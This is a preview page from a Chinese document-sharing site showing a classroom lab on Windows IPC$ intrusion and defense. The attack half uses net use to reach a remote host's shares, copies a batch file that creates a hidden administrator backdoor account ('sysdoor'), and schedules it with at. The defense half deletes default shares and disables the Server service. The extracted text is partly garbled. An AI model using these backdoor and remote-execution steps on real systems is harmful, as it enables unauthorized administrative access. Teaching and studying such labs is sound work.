返回
IPC$入侵防御实验.doc

IPC$入侵防御实验.doc

ID:57491162

大小:828.50 KB

页数:12页

时间:2020-08-24

IPC$入侵防御实验.doc_第1页
IPC$入侵防御实验.doc_第2页
IPC$入侵防御实验.doc_第3页
IPC$入侵防御实验.doc_第4页
IPC$入侵防御实验.doc_第5页
资源描述:

《IPC$入侵防御实验.doc》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、.....IPC$入侵和防实验一、试验目的:学习使用windows系统自带IPC$有关的的网络管理和控制命令,巩固对所学知识的理解。二、 试验容:   通过使用windows系统自带的IPC$有关的网络管理和控制命令,观看其结果并进行分析,加深对这些工具的理解和灵活运用。三、 试验环境:(1)安装WINDOWSNT或WINDOWS2000以上版本的操作系统。(2)已开放IPC$共享。(3)已知远程主机IP地址。(4)已知远程主机的管理员和密码(IPC$空连接除外)其中远程主机所需条件:1、安装WINDOWSNT或WINDOWS

2、2000以上版本的操作系统。2、已开放IPC$共享。3、已启动SERVER服务。四、 试验步骤:①启动命令行控制台(虚拟机和本地机)单击“开始”→“运行”,在“运行”对话框中键入:“CMD.....c.....“命令启动命令行控制台。②查看IPC$共享是否开放:Cmd——Netshare③在虚拟机上建立用户,并把用户加入administators组中Netuser用户名密码/addNetlocalgroupadministrators用户名/addNetlocalgroupadminstrators④建立IPC$连接在命令行提

3、示符下键入如下命令:Netuse\IP地址ipc$“密码”/user:用户名如:Netuse\IP地址ipc$“12345”/user:administrator⑤映射网络驱动器成功建立了IPC$连接后,在命令行提示符下键入命令:Netuse本地盘符\IP地址共享名如:Netusez:\192.168.1.3c$该命令的执行结果是将目标主机的C盘映射为本地机的z盘。映射成功后,就可以对目标主机进行操作和控制了。⑥COPY文件命令格式:Copy本地文件的路径文件名\远程主机IP远程主机文件路径。如:Copy

4、c:/bake.bat\192.168.1.3c$⑦断开IPC$连接.....c.....在命令行提示符下键入命令:Netuse\IP地址IPC$/del思考:如果不知道远程主机的用户名和密码,可以连接上远程主机吗?可以实现以上哪些操作?④留后门(1)打开记事本编写批处理程序建立后门的批处理程序为:Netusersysdoor12345/addNetlocalgroupadministratorsysdoor/add其中“Netusersysdoor12345/add“命令添加密码为12345的sysdoor。“Net

5、localgroupadministratorsysdoor/add”命令则把sysdoor添加到管理员组中去。后门程序编写好后,需要起个名字,在我们的实验中将它取名为“bake.bat”。(2)批处理程序建立好后,我们通过IPC$将它拷贝到目标主机,命令格式为:Copy本地文件的路径文件名\远程主机IP远程主机文件路径。Copyc:/bake.bat\192.168.1.3c$(3)在命令行提示符下键入命令:nettime\ip,查看系统时间At\192.168.1.314:10c:bake.bat.....

6、c.....⑤断开IPC$连接在命令行提示符下键入命令:Netuse\192.168.1.3IPC$/del这条命令的执行结果是断开与远程主机192.168.1.3的IPC$连接。我们也可以用Netuse*/del断开所有的连接。⑥IPC$空连接如果我们要与远程主机192.168.1.3建立IPC$空连接,则在命令行提示符下键入命令:Netuse\192.168.1.3“”/user:Ipc$防御试验二IPC$的安全解决方案①删除默认共享(1)在命令符下键入Netshare命令查看系统当前的默认共享。(2)打开记事本,编

7、写批处理程序,如下:NetshareIPC$/delNetsharee$/delNetsharec$/delNetshared$/del(3)保存为delshare.bat(4)单击C:DocumentsandSettingsAdministrator「开始」菜单程序启动,将delshare.bat文件拷贝到它的启动组中。.....c.....做完前面的事情后,重新启动计算机,然后用Netshare命令验证一下系统中的默认共享资源是否已经被全部删除,如果没有,还有哪些?尝试在本地机中用Netuse\IP地址ipc

8、$“密码”/user:用户名的命令是否还能建立IPC$连接?①关闭SERVER服务单击“控制面板”→“管理工具”→“服务”打开服务管理器,在服务列表中找到“Server”服务,用右键单击该服务,在弹出的菜单中选择”属性“,然后选择”禁止“选项就完成了关闭操作。重启计算机后修改

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。